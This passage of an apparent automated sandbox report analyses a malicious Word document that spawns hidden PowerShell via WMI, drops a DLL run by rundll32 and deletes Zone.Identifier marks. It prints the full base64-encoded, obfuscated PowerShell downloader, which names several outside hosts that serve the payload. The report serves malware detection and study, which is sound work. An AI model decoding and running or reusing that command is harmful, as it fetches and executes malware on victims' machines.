XQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002608D0 push edx; ret 7_2_002609D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002439A0 push cs; ret 7_2_002439A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242A01 push esi; ret 7_2_00242A04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245BD8 push ss; iretd 7_2_00245C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245C29 push ss; iretd 7_2_00245C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024548F push ebp; retf 7_2_00245496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242CFB push ecx; retn 001Eh7_2_00242D01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241740 push DA0FDC41h; iretd 7_2_00241745
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E08D0 push edx; ret 8_2_001E09D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C39A0 push cs; ret 8_2_001C39A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2A01 push esi; ret 8_2_001C2A04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C5BD8 push ss; iretd 8_2_001C5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C5C29 push ss; iretd 8_2_001C5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C548F push ebp; retf 8_2_001C5496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2CFB push ecx; retn 001Eh8_2_001C2D01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C1740 push DA0FDC41h; iretd 8_2_001C1745
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002408D0 push edx; ret 9_2_002409D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002239A0 push cs; ret 9_2_002239A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00222A01 push esi; ret 9_2_00222A04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00225BD8 push ss; iretd 9_2_00225C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00225C29 push ss; iretd 9_2_00225C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0022548F push ebp; retf 9_2_00225496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00222CFB push ecx; retn 001Eh9_2_00222D01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00221740 push DA0FDC41h; iretd 9_2_00221745
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002108D0 push edx; ret 10_2_002109D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F39A0 push cs; ret 10_2_001F39A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2A01 push esi; ret 10_2_001F2A04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5BD8 push ss; iretd 10_2_001F5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5C29 push ss; iretd 10_2_001F5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F548F push ebp; retf 10_2_001F5496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2CFB push ecx; retn 001Eh10_2_001F2D01

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bwwJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
